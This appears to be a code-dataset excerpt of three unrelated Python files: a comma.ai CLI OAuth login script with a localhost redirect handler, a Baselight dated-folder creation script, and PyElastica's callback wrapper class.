from tools.lib.api import APIError, CommaApi, UnauthorizedError
from tools.lib.auth_config import set_token, get_token
PORT = 3000
class ClientRedirectServer(HTTPServer):
query_params: Dict[str, Any] = {}
class ClientRedirectHandler(BaseHTTPRequestHandler):
def do_GET(self):
if not self.path.startswith('/auth'):
self.send_response(204)
return
query = self.path.split('?', 1)[-1]
query = parse_qs(query, keep_blank_values=True)
self.server.query_params = query
self.send_response(200)
self.send_header('Content-type', 'text/plain')
self.end_headers()
self.wfile.write(b'Return to the CLI to continue')
def log_message(self, format, *args): # pylint: disable=redefined-builtin
pass # this prevent http server from dumping messages to stdout
def auth_redirect_link(method):
provider_id = {
'google': 'g',
'apple': 'a',
'github': 'h',
}[method]
params = {
'redirect_uri': f"https://api.comma.ai/v2/auth/{provider_id}/redirect/",
'state': f'service,localhost:{PORT}',
}
if method == 'google':
params.update({
'type': 'web_server',
'client_id': '45471411055-ornt4svd2miog6dnopve7qtmh5mnu6id.apps.googleusercontent.com',
'response_type': 'code',
'scope': 'https://www.googleapis.com/auth/userinfo.email',
'prompt': 'select_account',
})
return 'https://accounts.google.com/o/oauth2/auth?' + urlencode(params)
elif method == 'github':
params.update({
'client_id': '28c4ecb54bb7272cb5a4',
'scope': 'read:user',
})
return 'https://github.com/login/oauth/authorize?' + urlencode(params)
elif method == 'apple':
params.update({
'client_id': 'ai.comma.login',
'response_type': 'code',
'response_mode': 'form_post',
'scope': 'name email',
})
return 'https://appleid.apple.com/auth/authorize?' + urlencode(params)
else:
raise NotImplementedError(f"no redirect implemented for method {method}")
def login(method):
oauth_uri = auth_redirect_link(method)
web_server = ClientRedirectServer(('localhost', PORT), ClientRedirectHandler)
print(f'To sign in, use your browser and navigate to {oauth_uri}')
webbrowser.open(oauth_uri, new=2)
while True:
web_server.handle_request()
if 'code' in web_server.query_params:
break
elif 'error' in web_server.query_params:
print('Authentication Error: "%s". Description: "%s" ' % (
web_server.query_params['error'],
web_server.query_params.get('error_description')), file=sys.stderr)
break
try:
auth_resp = CommaApi().post('v2/auth/', data={'code': web_server.query_params['code'], 'provider': web_server.query_params['provider']})
set_token(auth_resp['access_token'])
except APIError as e:
print(f'Authentication Error: {e}', file=sys.stderr)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Login to your comma account')
parser.add_argument('method', default='google', const='google', nargs='?', choices=['google', 'apple', 'github', 'jwt'])
parser.add_argument('jwt', nargs='?')
args = parser.parse_args()
if args.method == 'jwt':
if args.jwt is None:
print("method JWT selected, but no JWT was provided")
exit(1)
set_token(args.jwt)
else:
login(args.method)
try:
me = CommaApi(token=get_token()).get('/v1/me')
print("Authenticated!")
pprint.pprint(me)
except UnauthorizedError:
print("Got invalid JWT")
exit(1)
| 2.53125 | 3 |
datedfolder.py | IgorRidanovic/flapi | 3 | 5098 | <gh_stars>1-10
#! /usr/bin/env python
# -*- coding: utf-8 -*-
'''
Create a Baselight folder with current date and time stamp.
You must refresh the Job Manager after running the script.
Copyright (c) 2020 <NAME>, Igor [at] hdhead.com, www.metafide.com
'''
import flapi
from getflapi import getflapi
from datetime import datetime
def make_dated_folder(ip, scene, foldername):
conn, msg = getflapi()
jobman = conn.JobManager
stamp = datetime.now().strftime('_%d-%b-%Y_%H.%M.%S')
try:
jobman.create_folder(ip, scene, foldername + stamp)
except flapi.FLAPIException:
print 'Could not create a folder.'
return False
# Cleanup
conn.close()
if __name__=='__main__':
conn, msg = getflapi()
print msg + '\n'
ip = 'localhost'
currentScene = 'Test01'
folderName = 'MyFolder'
make_dated_folder(ip, currentScene, folderName)
| 2.703125 | 3 |
elastica/wrappers/callbacks.py | zhidou2/PyElastica | 71 | 5099 | <reponame>zhidou2/PyElastica<gh_stars>10-100
__doc__ = """
CallBacks
-----------
Provides the callBack interface to collect data over time (see `callback_functions.py`).
"""
from elastica.callback_functions import CallBackBaseClass
class CallBacks:
"""
CallBacks class is a wrapper for calling callback functions, set by the user. If the user
wants to collect data from the simulation, the simulator class has to be derived
from the CallBacks class.
Attributes
----------
_callbacks: list
List of call back classes defined for rod-like objects.
"""
def __init__(self):
self._callbacks = []
super(CallBacks, self).__init__()
def collect_diagnostics(self, system):
"""
This method calls user-defined call-back classes for a
user-defined system or rod-like object. You need to input the
system or rod-like object that you want to collect data from.
Parameters
----------
system: object
System is a rod-like object.
Returns
-------
"""
sys_idx = self._get_sys_idx_if_valid(system)
# Create _Constraint object, cache it and return to user
_callbacks = _CallBack(sys_idx)
self._callbacks.append(_callbacks)
return _callbacks
def _finalize(self):
# From stored _CallBack objects, instantiate the boundary conditions
# inplace : https://stackoverflow.com/a/1208792
# dev : the first index stores the rod index to collect data.
# Technically we can use another array but it its one more book-keeping
# step. Being lazy, I put them both in the same array
self._callbacks[:] = [
(callback.id(), callback(self._systems[callback.id()]))
for callback in self._callbacks
]
# Sort from lowest id to highest id for potentially better memory access
# _callbacks contains list of tuples. First element of tuple is rod number and
# following elements are the type of boundary condition such as
# [(0, MyCallBack), (1, MyVelocityCallBack), ... ]
# Thus using lambda we iterate over the list of tuples and use rod number (x[0])
# to sort callbacks.
self._callbacks.sort(key=lambda x: x[0])
self._callBack(time=0.0, current_step=0)
# TODO: same as above naming of _callBack function
def _callBack(self, time, current_step: int, *args, **kwargs):
for sys_id, callback in self._callbacks:
callback.make_callback(
self._systems[sys_id], time, current_step, *args, **kwargs
)
class _CallBack:
"""
CallBack wrapper private class
Attributes
----------
_sys_idx: rod object index
_callback_cls: list
*args
Variable length argument list.
**kwargs
Arbitrary keyword arguments.
"""
def __init__(self, sys_idx: int):
"""
Parameters
----------
sys_idx: int
"""
self._sys_idx = sys_idx
self._callback_cls = None
self._args = ()
self._kwargs = {}
def using(self, callback_cls, *args, **kwargs):
"""
This method is a wrapper to set which callback class is used to collect data
from user defined rod-like object.
Parameters
----------
callback_cls: object
User defined callback class.
*args
Variable length argument list
**kwargs
Arbitrary keyword arguments.
Returns
-------
"""
assert issubclass(
callback_cls, CallBackBaseClass
), "{} is not a valid call back. Did you forget to derive from CallBackClass?".format(
callback_cls
)
self._callback_cls = callback_cls
self._args = args
self._kwargs = kwargs
return self
def id(self):
return self._sys_idx
def __call__(self, *args, **kwargs):
"""Constructs a callback functions after checks
Parameters
----------
args
kwargs
Returns
-------
"""
if not self._callback_cls:
raise RuntimeError(
"No callback provided to act on rod id {0}"
"but a callback was registered. Did you forget to call"
"the `using` method".format(self.id())
)
try:
return self._callback_cls(*self._args, **self._kwargs)
except (TypeError, IndexError):
raise TypeError(
r"Unable to construct callback class.\n"
r"Did you provide all necessary callback properties?"
)
| 2.703125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.